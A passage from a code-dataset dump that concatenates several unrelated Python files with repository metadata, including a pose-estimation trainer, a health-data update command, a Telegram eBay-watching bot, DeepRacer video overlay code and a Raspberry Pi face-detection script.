elif test_dataset_name == "lsp":
test_template_filled = test_template.format(
test_dataset_name,
self.epoch+1,
self.num_epoch,
part_Acc_average_meter=self.part_Acc_average_meter,
part_F1_average_meter=self.part_F1_average_meter,
Acc_average_meter=self.Acc_average_meter,
F1_average_meter=self.F1_average_meter,
test_time=get_HHMMSS_from_second(seconds=(time.time()-test_start)),
epoch_time=get_HHMMSS_from_second(seconds=(time.time()-self.epoch_start)),
total_time=get_HHMMSS_from_second(seconds=(time.time()-self.total_start))
)
print(test_template_filled)
# save test templates info txt file
if self.args.train != 0:
if test_dataset_name == "h36m":
self.test_templates_h36m.append(test_template_filled)
templates_filename = "test_templates_h36m.txt"
save_templates_info(self.test_templates_h36m, self.output_dir, templates_filename)
elif test_dataset_name == "3dpw":
self.test_templates_3dpw.append(test_template_filled)
templates_filename = "test_templates_3dpw.txt"
save_templates_info(self.test_templates_3dpw, self.output_dir, templates_filename)
elif test_dataset_name == "lsp":
self.test_templates_lsp.append(test_template_filled)
templates_filename = "test_templates_lsp.txt"
save_templates_info(self.test_templates_lsp, self.output_dir, templates_filename)
else:
self.test_templates.append(test_template_filled)
templates_filename = "test_templates.txt"
save_templates_info(self.test_templates, self.output_dir, templates_filename)
# save pth file
if is_save_pth:
if self.epoch >= self.args.first_stage_nEpoch:
if test_dataset_name == "h36m" or test_dataset_name == "3dpw":
# Save best pth
if self.mpjpe_average_meter.avg < current_mpjpe:
print("MPJPE changes from {:.4f} to {:.4f}".format(current_mpjpe, self.mpjpe_average_meter.avg))
self.save_checkpoint_all(test_dataset_name, best=True)
else:
print("MPJPE doesn't change {:.4f}".format(current_mpjpe))
elif test_dataset_name == "lsp":
# Save best pth
if self.Acc_average_meter > current_acc:
print("ACC changes from {:.4f} to {:.4f}".format(current_acc, self.Acc_average_meter))
self.save_checkpoint_all(test_dataset_name, best=True)
else:
print("ACC doesn't change {:.4f}".format(current_acc))
# Save lastest pth
if self.args.save_pth_all_epoch:
self.save_checkpoint_all(test_dataset_name, save_all_epoch=True)
else:
self.save_checkpoint_all(test_dataset_name)
def save_checkpoint_all(self, test_dataset_name, best=False, save_all_epoch=False):
"""
save pth file
"""
filename = "best_{}_{}.pth" if best else "{}.pth"
if save_all_epoch and not best:
filename = "{}_{}_epoch"+str(self.epoch+1)+".pth"
### 3task network save pth, texture net save pth ###
if self.epoch < self.args.first_stage_nEpoch:
save_checkpoint({
"state_dict": self.context_encoder_net.state_dict(),
"loss": self.losses_CE.avg,
"optimizer": self.context_encoder_optimizer.state_dict()
},
self.output_dir,
filename.format("context_encoder_net", test_dataset_name))
save_checkpoint({
"state_dict": self.discriminator.state_dict(),
"loss": self.losses_DC.avg,
"optimizer": self.discriminator_optimizer.state_dict()
},
self.output_dir,
filename.format("discriminator", test_dataset_name))
save_checkpoint({
"state_dict": self.jigsaw_puzzle_net.state_dict(),
"accuracy": self.acces_JP.avg,
"optimizer": self.jigsaw_puzzle_optimizer.state_dict()
},
self.output_dir,
filename.format("jigsaw_puzzle_net", test_dataset_name))
save_checkpoint({
"state_dict": self.rotation_net.state_dict(),
"accuracy": self.acces_ROT.avg,
"optimizer": self.rotation_optimizer.state_dict()
},
self.output_dir,
filename.format("rotation_net", test_dataset_name))
save_checkpoint({
"state_dict": self.texture_net.state_dict(),
"loss": self.losses_texture_ori_img.avg,
"optimizer": self.texture_net_optimizer.state_dict(),
},
self.output_dir,
filename.format("texture_net", test_dataset_name))
### hmr save pth ###
else:
save_checkpoint({
"state_dict": self.HMR.state_dict(),
"loss_joints3d": self.losses_HMR_joints3d.avg,
"loss_3task": self.losses_HMR_3task.avg,
"optimizer_joints": self.HMR_optimizer_all.state_dict(),
},
self.output_dir,
filename.format("hmr", test_dataset_name))
save_checkpoint({
"state_dict": self.texture_discriminator.state_dict(),
"loss": self.losses_disc.avg,
"optimizer": self.texture_discriminator_optimizer.state_dict()
},
self.output_dir,
filename.format("texture_discriminator", test_dataset_name))
if best:
if test_dataset_name == "h36m":
self.current_mpjpe_h36m = self.mpjpe_average_meter.avg
elif test_dataset_name == "3dpw":
self.current_mpjpe_3dpw = self.mpjpe_average_meter.avg
elif test_dataset_name == "lsp":
self.current_acc_lsp = self.Acc_average_meter
def fit(self):
if self.args.train != 0:
self.current_mpjpe_h36m = math.inf
self.current_mpjpe_3dpw = math.inf
self.current_acc_lsp = 0
self.train_loss = math.inf
self.total_start = time.time()
self.train_templates = list()
self.test_templates_h36m = list()
self.test_templates_3dpw = list()
self.test_templates_lsp = list()
for epoch in range(self.num_epoch):
self.epoch = epoch
self.epoch_start = time.time()
if epoch == 0 and self.args.first_eval:
self.epoch = -1
self.evaluate(self.test_dataloader_h36m, test_dataset_name="h36m", is_save_pth=False)
# self.evaluate(self.test_dataloader_3dpw, test_dataset_name="3dpw", is_save_pth=False)
# self.evaluate(self.test_dataloader_lsp, test_dataset_name="lsp", is_save_pth=False)
self.epoch = epoch
print("HMR_optimizer_joints lr:", self.HMR_scheduler_all.get_lr())
if self.epoch == self.args.first_stage_nEpoch:
texture_discriminator_checkpoint = torch.load(os.path.join("results", self.args.output_dir, "save_pth", "discriminator.pth"), map_location=self.device)
self.texture_discriminator.load_state_dict(texture_discriminator_checkpoint["state_dict"])
self.train()
if self.epoch >= self.args.first_stage_nEpoch:
self.HMR_scheduler_all.step()
if (epoch+1)%self.args.freq_eval == 0 or (epoch+1) == self.num_epoch:
self.evaluate(self.test_dataloader_h36m, test_dataset_name="h36m")
# self.evaluate(self.test_dataloader_3dpw, test_dataset_name="3dpw")
# self.evaluate(self.test_dataloader_lsp, test_dataset_name="lsp")
else:
self.epoch = 0
self.num_epoch = 1
self.total_start = time.time()
self.epoch_start = time.time()
self.test_templates = list()
self.evaluate(self.test_dataloader, test_dataset_name=self.args.test_dataset.replace("-p2", ""), is_save_pth=False) | JunukCha/SSPSE | trainer.py | trainer.py | py | 45,916 | python | en | code | 6 | github-code | 36 | [
{
"api_name": "datetime.datetime.now",
"line_number": 131,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 131,
"usage_type": "attribute"
},
{
"api_name": "datetime.datetime.strftime",
"line_number": 132,
"usage_type": "call"
},
{
"api_na... |
22313884437 | from django.core.management.base import BaseCommand
from import_data.models import OuraMember, FitbitMember, GoogleFitMember
from retrospective.tasks import (
update_fitbit_data,
update_oura_data,
update_googlefit_data,
)
import time
import requests
class Command(BaseCommand):
help = "Updates all data for all members"
def handle(self, *args, **options):
# cheat to wake up sleeping worker
requests.get("https://oh-oura-connect.herokuapp.com/")
oura_users = OuraMember.objects.all()
for o in oura_users:
update_oura_data.delay(o.id)
print("submitted oura update for {}".format(o.id))
time.sleep(2)
fitbit_users = FitbitMember.objects.all()
for f in fitbit_users:
update_fitbit_data.delay(f.id)
print("submitted fitbit update for {}".format(f.id))
time.sleep(2)
gf_users = GoogleFitMember.objects.all()
for g in gf_users:
update_googlefit_data.delay(g.user.oh_id, g.user.user.id)
print("submitted googlefit update for {}".format(g.id))
time.sleep(2)
| OpenHumans/quantified-flu | import_data/management/commands/update_data_imports.py | update_data_imports.py | py | 1,148 | python | en | code | 24 | github-code | 36 | [
{
"api_name": "django.core.management.base.BaseCommand",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "requests.get",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "import_data.models.OuraMember.objects.all",
"line_number": 19,
"usage_type": "call"
... |
11514166585 | from hashlib import sha1
from json import dump
from os import makedirs
apps = {
'apps': [
'club.postdata.covid19cuba',
'com.codestrange.www.cuba_weather',
'com.cubanopensource.todo',
]
}
def main():
result = {}
makedirs('api', exist_ok=True)
with open(f'api/apps.json', mode='w', encoding='utf-8') as file:
dump(apps, file, ensure_ascii=False)
with open('api/apps.json', encoding='utf-8') as file:
text = file.read()
cache = sha1(text.encode())
result['hash'] = cache.hexdigest()
with open(f'api/apps_hash.json', mode='w', encoding='utf-8') as file:
dump(result, file, ensure_ascii=False)
if __name__ == '__main__':
main()
| leynier/cubaopenplay.github.io | app/main.py | main.py | py | 725 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "os.makedirs",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "json.dump",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "hashlib.sha1",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "json.dump",
"line_number": 25,... |
5881104834 | import array
import binascii
import configparser
import datetime
import io
import logging
import os
import signal
import sys
import time
try:
import serial
except ImportError:
pass
ModulSerialMissing = True
################################################################################
# Constants
BUILDVERSION = "V1.0.0"
BUILDDATE = "2017-10-22"
################################################################################
# classes / structs
class mondata:
def __init__(self):
self.viewmode=0
self.Lights="0"
self.SC1TX="0"
self.percAssist="000"
self.AWD="0"
self.C10="0"
self.Voltage="000"
self.Current="000"
self.SC1RX="0"
self.SC2="00"
self.Speed="000"
self.D1618="000"
self.D1921="000"
self.D2224="000"
self.D2527="000"
self.wsize="0"
self.TX=""
self.RX=""
self.PLIST=["---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---","---"]
################################################################################
# Import external functions
import lib.message as msg
import lib.config as cfg
import lib.osys as osy
import arg as arg
# TODO:
# - TX RX Handlers
# - TX RX Parsers
# - Basic Logging
# - Basic TX Construction mode (Parameter Reading P00 P59)
# - PDCURSES?
################################################################################
# Functions
def signal_handler(signal, frame):
sys.exit(0)
################################################################################
# beginn main
# init global vars
monitordata= mondata()
mondata.viewmode=0
signal.signal(signal.SIGINT, signal_handler)
cfg.read(cfg)
if len(sys.argv) == 1:
print('\npye-motion ' + BUILDVERSION + ' - ' + BUILDDATE)
# check for modules which might not be part of the standard python 3 installation
if 'ModulSerialMissing' in locals():
print('Missing Module pyserial. Install by typing pye-motion -install')
print('No command line argument given. type pye-motion -help for valid arguments')
if len(sys.argv) != 1:
if (sys.argv[1] in ("-help")):
arg.help()
exit()
elif (sys.argv[1] in ( "-install")):
arg.install()
exit()
elif (sys.argv[1] in ( "-listen")):
msg.serialOpen(cfg)
arg.listen(monitordata)
elif (sys.argv[1] in ( "-plisten")):
print("warning: This modus requires to set the LCD into settings mode first. ")
print("Hold + and - simultaneously to enter settings. ")
rawtx = input("press enter to continue")
msg.serialOpen(cfg)
arg.plisten(monitordata)
elif (sys.argv[1] in ( "-pquery")):
print("warning: This modus requires to set the LCD into settings mode first. ")
print("Hold + and - simultaneously to enter settings. ")
rawtx = input("press enter to continue")
msg.serialOpen(cfg)
arg.pquery(monitordata)
elif (sys.argv[1] in ( "-speedlimit")):
print("warning: This modus requires to set the LCD into settings mode first. ")
print("Hold + and - simultaneously to enter settings. ")
rawtx = input("press enter to continue")
msg.serialOpen(cfg)
if len(sys.argv) == 3:
arg.speedlimit(monitordata, sys.argv[2])
else:
arg.speedlimit(monitordata, 0)
exit()
else:
print('Invalid command line argument given. type pye-motion - help for valid arguments')
# sample code for opening, sending, receiving and closing comport
#ser = serial.Serial(port_A, py pybaudrate=baud_A, timeout=1) # open first serial port
#print ("Port opened: " + ser.portstr) # check which port was really used
#ser.write("hello world".encode("utf-8")) # write a string
#receive = ser.read(11)
#print (receive.decode("utf-8"))
#ser.close() # close port
| nasrudin2468/pye-motion | pye-motion.py | pye-motion.py | py | 4,158 | python | en | code | 4 | github-code | 36 | [
{
"api_name": "sys.exit",
"line_number": 72,
"usage_type": "call"
},
{
"api_name": "signal.signal",
"line_number": 81,
"usage_type": "call"
},
{
"api_name": "signal.SIGINT",
"line_number": 81,
"usage_type": "attribute"
},
{
"api_name": "lib.config.read",
"line... |
38660134742 | import logging
import sys
import click
import requests
from bs4 import BeautifulSoup
from telegram.ext import CommandHandler, Filters, MessageHandler, Updater
from tinydb import Query, TinyDB
db = TinyDB("db.json")
Job = Query()
TELEGRAM_BOT_TOKEN = None
class JobExistsException(Exception):
pass
def parse_result_item(item):
"""
Takes a li item containing one search result and parses id, url and price from it.
Returns a dict containing the results.
"""
main = item.find_all("div", {"aditem-main"})
price = item.find_all("p", {"aditem-main--middle--price"})
article = item.find_all("article")
if len(main) != 1 or len(article) != 1 or len(price) != 1:
return
main = main[0]
article = article[0]
price = price[0]
result = {
"ad_id": article["data-adid"],
"price": price.text.strip(),
}
a = main.find_all("a")[0]
result["url"] = "https://www.ebay-kleinanzeigen.de" + a["href"]
return result
def execute_search(search_term):
"""
Runs the search for one search term.
Returns a list containing all parsed search results.
"""
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"
}
url = f"https://www.ebay-kleinanzeigen.de/s-79249/{search_term}/k0l9364r20"
response = requests.get(url, headers=headers)
soup = BeautifulSoup(response.content, features="html.parser")
ul = soup.find_all("ul", {"id": "srchrslt-adtable"})
assert len(ul) == 1
ul = ul[0]
items = ul.find_all("li")
results = []
for i in items:
data = parse_result_item(i)
if data is not None:
results.append(data)
if len(results) == 0:
logging.warning(
f"No results found for search term '{search_term}'. Check if parser works correctly."
)
return results
def init_search(search_term, chat_id):
"""
Initialize a new search term.
Executes one search and marks all current results as known.
"""
result = db.search(Job.search_term == search_term)
if result:
raise JobExistsException
initial_results = execute_search(search_term)
ids = [_["ad_id"] for _ in initial_results]
db.insert({"search_term": search_term, "chat_id": chat_id, "known_ads": ids})
def echo(update, context):
context.bot.send_message(chat_id=update.effective_chat.id, text=update.message.text)
def start_watching(update, context):
"""
Command handler for starting to watch a new search term.
"""
search_target = "".join(context.args)
try:
init_search(search_target, update.effective_chat.id)
except JobExistsException:
reply = "Hm, looks like I'm watching that already."
else:
reply = f"Ok, I'll start watching '{search_target}'"
context.bot.send_message(chat_id=update.effective_chat.id, text=reply)
def stop_watching(update, context):
"""
Command handler for stopping to watch a search term
"""
search_term = "".join(context.args)
result = db.search(Job.search_term == search_term)
if not result:
reply = "I don't think I am watching that."
else:
db.remove(Job.search_term == search_term)
reply = "Ok. I'll no longer watch " + search_term
context.bot.send_message(chat_id=update.effective_chat.id, text=reply)
def look_for_stuff(context):
"""
Command handler to peridically check all active search jobs.
"""
for job in db.all():
known_ads = set(job["known_ads"])
results = execute_search(job["search_term"])
something_new = False
for r in results:
if r["ad_id"] not in known_ads:
message = (
f"New item for {job['search_term']} ({r['price']}): {r['url']}"
)
context.bot.send_message(chat_id=job["chat_id"], text=message)
known_ads.add(r["ad_id"])
something_new = True
if something_new:
db.update(
{"known_ads": list(known_ads)}, Job.search_term == job["search_term"]
)
else:
# context.bot.send_message(chat_id=job["chat_id"], text=f"Nothing new for {job['search_term']}")
pass
def status(update, context):
message = "I'm currently watching: \n"
for job in db.all():
message += "- " + job["search_term"] + "\n"
context.bot.send_message(chat_id=update.effective_chat.id, text=message)
@click.group()
def cli():
pass
@cli.command()
@click.option("--token", prompt=True, help="The telegram bot api token")
def run(token):
TELEGRAM_BOT_TOKEN = token
updater = Updater(token=TELEGRAM_BOT_TOKEN, use_context=True)
dispatcher = updater.dispatcher
job_queue = updater.job_queue
job_minute = job_queue.run_repeating(look_for_stuff, interval=5 * 60, first=0)
echo_handler = MessageHandler(Filters.text & (~Filters.command), echo)
dispatcher.add_handler(echo_handler)
start_watching_handler = CommandHandler("start", start_watching)
dispatcher.add_handler(start_watching_handler)
stop_handler = CommandHandler("stop", stop_watching)
dispatcher.add_handler(stop_handler)
status_handler = CommandHandler("status", status)
dispatcher.add_handler(status_handler)
updater.start_polling()
@cli.command()
@click.argument("searchterm")
def search(searchterm):
data = execute_search(searchterm)
click.echo(data)
if __name__ == "__main__":
cli()
| NiklasMM/ebk-bot | bot.py | bot.py | py | 5,611 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "tinydb.TinyDB",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "tinydb.Query",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 56,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line... |
32716485591 | """ Image editing class for head to bot, time-trail, obstacle where
there is only single agent
"""
import datetime
import logging
import rospy
import cv2
from markov.log_handler.logger import Logger
from markov.utils import get_racecar_idx
from mp4_saving import utils
from mp4_saving.constants import (RaceCarColorToRGB,
IconographicImageSize,
TrackAssetsIconographicPngs, RACE_COMPLETE_Y_OFFSET,
RACE_TYPE_TO_VIDEO_TEXT_MAPPING, XYPixelLoc, AWS_DEEPRACER_WATER_MARK,
SCALE_RATIO, FrameQueueData)
from mp4_saving.image_editing_interface import ImageEditingInterface
from mp4_saving.top_view_graphics import TopViewGraphics
LOG = Logger(__name__, logging.INFO).get_logger()
class SingleAgentImageEditing(ImageEditingInterface):
""" Image editing class for head to bot, time-trail, obstacle where
there is only single agent
"""
def __init__(self, racecar_name, racecar_info, race_type):
""" Initializing the required data for the head to bot, time-trail. This is used for single agent
Arguments:
racecars_info (list): list of dict having information of the agent
race_type (str): Since this class is reused for all the different race_type
"""
self.racecar_info = racecar_info
self.race_type = race_type
racecar_index = get_racecar_idx(racecar_name)
self.racecar_index = racecar_index if racecar_index else 0
# Store the font which we will use to write the phase with
self.amazon_ember_regular_20px = utils.get_font('AmazonEmber-Regular', 20)
self.amazon_ember_regular_16px = utils.get_font('AmazonEmber-Regular', 16)
self.amazon_ember_heavy_30px = utils.get_font('AmazonEmber-Heavy', 30)
self.amazon_ember_light_18px = utils.get_font('AmazonEmber-Light', 18)
self.amazon_ember_light_20px = utils.get_font('AmazonEmber-Light', 20)
self.amazon_ember_light_italic_20px = utils.get_font('AmazonEmber-LightItalic', 20)
self.is_racing = rospy.get_param("VIDEO_JOB_TYPE", "") == "RACING"
self.is_league_leaderboard = rospy.get_param("LEADERBOARD_TYPE", "") == "LEAGUE"
self.leaderboard_name = rospy.get_param("LEADERBOARD_NAME", "")
self._total_laps = int(rospy.get_param("NUMBER_OF_TRIALS", 0))
# The track image as iconography
self.track_icongraphy_img = utils.get_track_iconography_image()
# Track image offset
self.track_loc_offset = XYPixelLoc.TRACK_IMG_WITH_OFFSET_LOC.value if self.is_league_leaderboard \
else XYPixelLoc.TRACK_IMG_WITHOUT_OFFSET_LOC.value
# Gradient overlay image
gradient_img_path = TrackAssetsIconographicPngs.OBSTACLE_OVERLAY_PNG_LEAGUE_LEADERBOARD.value \
if self.is_league_leaderboard else TrackAssetsIconographicPngs.OBSTACLE_OVERLAY_PNG.value
self.gradient_img = self._plot_track_on_gradient(gradient_img_path)
self.gradient_alpha_rgb_mul, self.one_minus_gradient_alpha = utils.get_gradient_values(self.gradient_img)
# Top camera information
top_camera_info = utils.get_top_camera_info()
self.top_view_graphics = TopViewGraphics(top_camera_info.horizontal_fov, top_camera_info.padding_pct,
top_camera_info.image_width, top_camera_info.image_height,
racecar_info)
def _edit_major_cv_image(self, major_cv_image, mp4_video_metrics_info):
""" Apply all the editing for the Major 45degree camera image
Args:
major_cv_image (Image): Image straight from the camera
Returns:
Image: Edited main camera image
"""
# Applying gradient to whole major image and then writing text
major_cv_image = utils.apply_gradient(major_cv_image, self.gradient_alpha_rgb_mul,
self.one_minus_gradient_alpha)
# Top left location of the picture
loc_x, loc_y = XYPixelLoc.SINGLE_AGENT_DISPLAY_NAME_LOC.value
# Display name (Racer name/Model name)
display_name = self.racecar_info[self.racecar_index]['display_name']
display_name_txt = display_name if len(display_name) < 15 else "{}...".format(display_name[:15])
major_cv_image = utils.write_text_on_image(image=major_cv_image, text=display_name_txt,
loc=(loc_x, loc_y), font=self.amazon_ember_regular_20px,
font_color=RaceCarColorToRGB.White.value,
font_shadow_color=RaceCarColorToRGB.Black.value)
# Lap Counter
loc_y += 30
current_lap = min(int(mp4_video_metrics_info[self.racecar_index].lap_counter) + 1, self._total_laps)
lap_counter_text = "{}/{}".format(current_lap, self._total_laps)
major_cv_image = utils.write_text_on_image(image=major_cv_image, text=lap_counter_text,
loc=(loc_x, loc_y), font=self.amazon_ember_heavy_30px,
font_color=RaceCarColorToRGB.White.value,
font_shadow_color=RaceCarColorToRGB.Black.value)
# total_evaluation_time (Race time)
loc_y += 45
total_eval_milli_seconds = mp4_video_metrics_info[self.racecar_index].total_evaluation_time
time_delta = datetime.timedelta(milliseconds=total_eval_milli_seconds)
total_eval_time_text = "Race | {}".format(utils.milliseconds_to_timeformat(time_delta))
major_cv_image = utils.write_text_on_image(image=major_cv_image, text=total_eval_time_text,
loc=(loc_x, loc_y), font=self.amazon_ember_light_18px,
font_color=RaceCarColorToRGB.White.value,
font_shadow_color=RaceCarColorToRGB.Black.value)
# Reset counter
loc_y += 25
reset_counter_text = "Reset | {}".format(mp4_video_metrics_info[self.racecar_index].reset_counter)
major_cv_image = utils.write_text_on_image(image=major_cv_image, text=reset_counter_text,
loc=(loc_x, loc_y), font=self.amazon_ember_light_18px,
font_color=RaceCarColorToRGB.White.value,
font_shadow_color=RaceCarColorToRGB.Black.value)
# Speed
loc_x, loc_y = XYPixelLoc.SPEED_EVAL_LOC.value
if self.is_league_leaderboard:
loc_x, loc_y = XYPixelLoc.SPEED_LEADERBOARD_LOC.value
speed_text = "{} m/s".format(utils.get_speed_formatted_str(mp4_video_metrics_info[self.racecar_index].throttle))
major_cv_image = utils.write_text_on_image(image=major_cv_image, text=speed_text,
loc=(loc_x, loc_y), font=self.amazon_ember_light_20px,
font_color=RaceCarColorToRGB.White.value,
font_shadow_color=RaceCarColorToRGB.Black.value)
# Leaderboard name
if self.is_league_leaderboard:
loc_x, loc_y = XYPixelLoc.LEADERBOARD_NAME_LOC.value
major_cv_image = utils.write_text_on_image(image=major_cv_image, text=self.leaderboard_name,
loc=(loc_x, loc_y), font=self.amazon_ember_regular_16px,
font_color=RaceCarColorToRGB.White.value,
font_shadow_color=RaceCarColorToRGB.Black.value)
# Evaluation type
loc_x, loc_y = XYPixelLoc.RACE_TYPE_EVAL_LOC.value
if self.is_league_leaderboard:
loc_x, loc_y = XYPixelLoc.RACE_TYPE_RACE_LOC.value
race_text = "race" if self.is_racing else "evaluation"
evaluation_type_txt = "{} {}".format(RACE_TYPE_TO_VIDEO_TEXT_MAPPING[self.race_type], race_text)
major_cv_image = utils.write_text_on_image(image=major_cv_image, text=evaluation_type_txt,
loc=(loc_x, loc_y), font=self.amazon_ember_light_italic_20px,
font_color=RaceCarColorToRGB.White.value,
font_shadow_color=RaceCarColorToRGB.Black.value)
# AWS Deepracer logo at the bottom for the community leaderboard
if self.is_league_leaderboard:
major_cv_image = utils.write_text_on_image(image=major_cv_image, text=AWS_DEEPRACER_WATER_MARK,
loc=XYPixelLoc.AWS_DEEPRACER_WATER_MARK_LOC.value,
font=self.amazon_ember_regular_16px,
font_color=RaceCarColorToRGB.White.value,
font_shadow_color=RaceCarColorToRGB.Black.value)
# Check if the done flag is set and set the banner appropriately
if mp4_video_metrics_info[self.racecar_index].done and (int(self._total_laps) >= current_lap):
# When the cv2 text is written, it automatically drops the alpha value of the image
rel_y_offset = XYPixelLoc.TRACK_IMG_WITH_OFFSET_LOC.value[1] if self.is_league_leaderboard else 0
racecomplete_image = utils.get_image(TrackAssetsIconographicPngs.RACE_COMPLETE_OVERLAY_PNG.value,
IconographicImageSize.RACE_COMPLETE_IMAGE_SIZE.value)
x_offset = major_cv_image.shape[1] - racecomplete_image.shape[1]//2
y_offset = major_cv_image.shape[0] - RACE_COMPLETE_Y_OFFSET - rel_y_offset - racecomplete_image.shape[0]//2
major_cv_image = utils.plot_rectangular_image_on_main_image(
major_cv_image, racecomplete_image, (x_offset, y_offset))
major_cv_image = cv2.cvtColor(major_cv_image, cv2.COLOR_RGB2BGRA)
return major_cv_image
def _plot_track_on_gradient(self, gradient_img_path):
""" For the given gradient apply the track iconographic image and use this to apply gradient
on each camera frame. Previously this was done on the top camera which changed every frame. But
with the track iconographic image set static, adding the track on gradient is more optimized.
Arguments:
gradient_img_path (str): Gradient image path
Returns:
(Image): Edited gradient image with track image
"""
gradient_img = utils.get_image(gradient_img_path, IconographicImageSize.FULL_IMAGE_SIZE.value)
gradient_img = cv2.cvtColor(gradient_img, cv2.COLOR_RGBA2BGRA)
track_icongraphy_scaled = utils.resize_image(self.track_icongraphy_img, SCALE_RATIO)
track_icongraphy_alpha = track_icongraphy_scaled[:, :, 3]/255.0
# Track image is placed at the bottom right with some offset (only in leaderboard tracks)
x_min = -(self.track_loc_offset[1] + track_icongraphy_scaled.shape[0])
x_max = gradient_img.shape[0] - self.track_loc_offset[1]
y_min = -(self.track_loc_offset[0] + track_icongraphy_scaled.shape[1])
y_max = gradient_img.shape[1] - self.track_loc_offset[0]
# This is used as the offset for plotting the agent dots
self.track_start_loc = (gradient_img.shape[1] + y_min, gradient_img.shape[0] + x_min)
for channel in range(0, 4):
gradient_img[x_min:x_max, y_min:y_max, channel] =\
(track_icongraphy_alpha * track_icongraphy_scaled[:, :, channel]) + \
(1 - track_icongraphy_alpha) * (gradient_img[x_min:x_max, y_min:y_max, channel])
return gradient_img
def _plot_agents_on_major_cv_image(self, major_cv_image, mp4_video_metrics_info):
""" Add the agents, obstacles on the track.
Arguments:
major_cv_image (Image): Edited image having gradient, text, track
mp4_video_metrics_info (List): List of ROS metric values of each agent
Returns:
Image: Edited image with gradient, text, track and agents with dots
"""
agents_loc = [(metric.x, metric.y) for metric in mp4_video_metrics_info]
objects_loc = []
if mp4_video_metrics_info[0].object_locations:
objects_loc = [(object_loc.x, object_loc.y) for object_loc in mp4_video_metrics_info[0].object_locations]
return self.top_view_graphics.plot_agents_as_circles(
major_cv_image, agents_loc, objects_loc, self.track_start_loc)
def edit_image(self, major_cv_image, metric_info):
mp4_video_metrics_info = metric_info[FrameQueueData.AGENT_METRIC_INFO.value]
major_cv_image = self._edit_major_cv_image(major_cv_image, mp4_video_metrics_info)
major_cv_image = self._plot_agents_on_major_cv_image(major_cv_image, mp4_video_metrics_info)
return cv2.cvtColor(major_cv_image, cv2.COLOR_BGRA2RGB)
| aws-deepracer-community/deepracer-simapp | bundle/src/deepracer_simulation_environment/scripts/mp4_saving/single_agent_image_editing.py | single_agent_image_editing.py | py | 13,347 | python | en | code | 79 | github-code | 36 | [
{
"api_name": "markov.log_handler.logger.Logger",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "logging.INFO",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "mp4_saving.image_editing_interface.ImageEditingInterface",
"line_number": 22,
"usage_t... |
18526754583 | import logging
import tqdm
from multiprocessing import Pool
from dsrt.config.defaults import DataConfig
class Padder:
def __init__(self, properties, parallel=True, config=DataConfig()):
self.properties = properties
self.config = config
self.parallel = parallel
self.max_ulen = self.properties['max-utterance-length']
self.max_dlen = self.properties['max-dialogue-length']
self.init_logger()
def init_logger(self):
self.logger = logging.getLogger()
self.logger.setLevel(self.config['logging-level'])
def transform(self, dialogues):
self.log('info', 'Padding the dialogues (using max utterance length={} tokens) ...'.format(self.max_ulen))
self.empty_turn = [self.config['pad-d']] * (self.properties['max-utterance-length'] + 1)
chunksize=self.config['chunksize']
p = Pool() if self.parallel else Pool(1)
res = []
total = len(dialogues)
self.log('info', '[padder running on {} cores]'.format(p._processes))
for d in tqdm.tqdm(p.imap(self.pad_dialogue, dialogues, chunksize=chunksize), total=total):
res.append(d)
p.close()
p.join()
return res
def pad_dialogues(self, dialogues):
"""
Pad the entire dataset.
This involves adding padding at the end of each sentence, and in the case of
a hierarchical model, it also involves adding padding at the end of each dialogue,
so that every training sample (dialogue) has the same dimension.
"""
self.log('info', 'Padding the dialogues ...')
return [self.pad_dialogue(d) for d in dialogues]
def pad_dialogue(self, dialogue):
for i, u in enumerate(dialogue):
dif = self.max_ulen - len(u) + 1
dialogue[i] += [self.config['pad-u']] * dif
# only pad the dialogue if we're training a hierarchical model
if self.config['hierarchical']:
dif = self.max_dlen - len(dialogue)
dialogues += [self.empty_turn] * dif
return dialogue
####################
# UTILITIES #
####################
def log(self, priority, msg):
"""
Just a wrapper, for convenience.
NB1: priority may be set to one of:
- CRITICAL [50]
- ERROR [40]
- WARNING [30]
- INFO [20]
- DEBUG [10]
- NOTSET [0]
Anything else defaults to [20]
NB2: the levelmap is a defaultdict stored in Config; it maps priority
strings onto integers
"""
self.logger.log(logging.CRITICAL, msg)
| sbarham/dsrt | dsrt/data/transform/Padder.py | Padder.py | py | 2,765 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "dsrt.config.defaults.DataConfig",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "logging.getLogger",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "multiprocessing.Pool",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": ... |
29055282773 | import io
import picamera
import cv2
import numpy
import serial
import time
import RPi.GPIO as gp
####### Servo Motor Contol #######
gp.setmode(gp.BOARD)
gp.setup(11, gp.OUT)
pwm=gp.PWM(11, 50)
pwm.start(3)
port = '/dev/ttyACM0'
Face = 0
turn=1
while(turn):
i=3
while(i):
#Create a memory stream so photos doesn't need to be saved in a file
stream = io.BytesIO()
#Get the picture (low resolution, so it should be quite fast)
#Here you can also specify other parameters (e.g.:rotate the image)
with picamera.PiCamera() as camera:
camera.resolution = (320, 240)
camera.capture(stream, format='jpeg')
print("Captured......................")
#Convert the picture into a numpy array
buff = numpy.fromstring(stream.getvalue(), dtype=numpy.uint8)
#Now creates an OpenCV image
image = cv2.imdecode(buff, 1)
#Load a cascade file for detecting faces
face_cascade = cv2.CascadeClassifier('/home/pi/Desktop/Buddy/haarcascade_frontalface_alt.xml')
#Convert to grayscale
